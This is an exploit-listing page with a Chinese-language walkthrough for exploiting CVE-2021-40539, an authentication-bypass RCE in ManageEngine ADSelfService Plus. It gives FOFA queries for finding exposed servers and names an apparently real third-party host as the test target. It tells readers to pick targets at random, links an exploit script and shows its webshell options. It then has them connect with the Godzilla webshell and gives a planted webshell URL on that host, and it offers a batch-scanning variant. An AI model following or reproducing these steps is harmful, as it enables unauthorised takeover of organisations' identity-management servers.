Exploit for Use of Incorrectly-Resolved Name or Reference in Zohocorp Manageengine Adselfservice Plus CVE-2021-40539

Name: Exploit for Use of Incorrectly-Resolved Name or Reference in Zohocorp Manageengine Adselfservice Plus CVE-2021-40539
Rating: 5 (231 reviews)

2024-10-12 | CVSS 9.8

## https://sploitus.com/exploit?id=138E1138-23D4-53B4-AFF2-24684DAA2A2F
# CVE-2021-40539
CVE-2021-40539：ADSelfService Plus RCE漏洞
一：漏洞描述
ZOHO ManageEngine ADSelfService Plus是卓豪（ZOHO）公司的针对 Active Directory 和云应用程序的集成式自助密码管理和单点登录解决方案。
CVE-2021-40539
Zoho ManageEngine ADSelfService Plus 6113 及更早版本存在 REST API 身份验证绕过漏洞，远程攻击者可以利用此漏洞来控制受影响的系统。该漏洞CVSS评分：9.33，危害等级：严重
二：漏洞利用
步骤一：FoFa语句查询
复制代码

# Fofa搜索语法
"ADSelfService"
app="ZOHO-ManageEngine-ADSelfService"
header="JSESSIONIDADSSP"    //推荐

# 测试数据
https://adself.66nao.com/
步骤二：随机找寻目标并使用以下检测脚本进行漏洞测试....

https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py
使用方式：
C:\Users\26629\Desktop\CVE-2021-40539-main>python39 exploit.py
usage: exploit.py [-h] -t TARGET [-w WEBSHELL] [-j JAVA_CLASS] [-s]
exploit.py: error: the following arguments are required: -t/--target
步骤三：使用哥斯拉链接并进行验证测试....
C
复制代码
1
https://adself.66nao.com//help/admin-guide/test.jsp


github上面下载的是单个扫描的，我对其进行二开，比其多一个-f 批量扫描的模块，大家可以下载使用